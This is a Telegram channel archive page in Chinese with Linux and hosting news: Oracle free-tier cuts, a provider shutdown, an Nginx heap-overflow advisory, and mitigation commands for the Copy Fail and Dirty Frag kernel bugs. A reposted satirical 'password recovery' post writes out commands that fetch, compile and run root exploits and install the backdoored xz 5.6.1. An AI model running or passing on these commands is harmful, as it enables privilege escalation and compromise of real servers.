Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
2 875
Подписчики
-124 часа
-57 дней
+2130 день
Архив постов
2 875
甲骨文免费ARM机器配置砍半
于6月12日更新的文档显示甲骨文云服务免费层级的ARM机型配额由原本的4C24G砍半到2C12G,尽管其他免费资源页的描述未更新,但建议已升级账号的各位提前做好资源缩容避免不必要的扣款
Available Shapes Micro instances (AMD processor): All tenancies get up to two Always Free VM instances using the VM.Standard.E2.1.Micro shape, which has an AMD processor. OCI Ampere A1 Compute instances (Arm processor): All tenancies get the first 1,500 OCPU hours and 9,000 GB hours per month for free for VM instances using the VM.Standard.A1.Flex shape, which has an Arm processor. For Always Free tenancies, this is equivalent to 2 OCPUs and 12 GB of memory.参考文档:https://docs.oracle.com/en-us/iaas/Content/FreeTier/freetier_topic-Always_Free_Resources.htm
2 875
Repost from zrj766的频道
#鸡讯 ClawCloud宣布自2026年6月30日起正式关闭VPS及相关托管业务
https://claw.cloud/announcements/38?language=chinese-simplified
请尽快迁移数据并申请退款
2 875
Repost from kMBRjund/0 🧊
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
2 875
Nginx 被发现一个存在18年的内存损坏漏洞,可导致远程代码执行,利用门槛低
漏洞存在于每个通用发行版都会包含的rewrite模块
ngx_http_rewrite_module ,影响开原版本Nginx 0.6.27至最近的1.30.0版本,在计算目标缓冲区大小时,使用的是原始字节长度,但在实际写入时,却进行了 URL 转义( + , % , & 等字符会扩展为 3 倍长度),溢出长度可控导致堆喷射
建议用户尽快更新至 1.30.1 / 1.31.0 版本
Ref: https://depthfirst.com/nginx-rift2 875
Repost from 咕 Billchan 咕 🐱 抹茶芭菲批发中心
Dirty Frag: Universal Linux LPE
和 Copy Fail 类似,绝大多数发行版可一键提权
禁用 esp4、esp6、rxrpc 可以缓解
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; true"2 875
Repost from 心惊报
请各位订户立即更新所有 Linux 设备的安全补丁、系统内核:
这次爆出的 Copy Fail (CVE-2026-31431) 是一个 非常严重 的极高危 Linux 内核恶性提权漏洞, 影响 2017 年发布以来几乎所有 Linux 发行版
刚好和同为恶性提权漏洞 Dirty COW (脏牛, CVE-2016-5195) 在影响面上直接续上了: 2007—2016 的发行版本可以用 CVE-2016-5195, 2017-2027 可以用 CVE-2026-31431
这个漏洞甚至比脏牛的利用门槛还更低、利用成功率更高,后者需要利用 Linux 内存子系统中的条件竞争特性,有时候利用时还会出现 Kernel Panic, 而前者的 PoC 成功率几乎就是 100%
时间线:
此漏洞最初由 Xint 研究员于 2026-03-23 发现,修复补丁已于 04-01 合并入 Linux 内核 mainline, 而漏洞的 PoC 已按流程于今日 (04-30) 公开。
由于 SSH/OpenSSL 等安全基建库几乎都在使用自行维护的用户态加密库, 所以 AF_ALG 可以直接禁用, 临时缓解措施 (仅供参考):
rmmod algif_aead 2>/dev/null || true
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
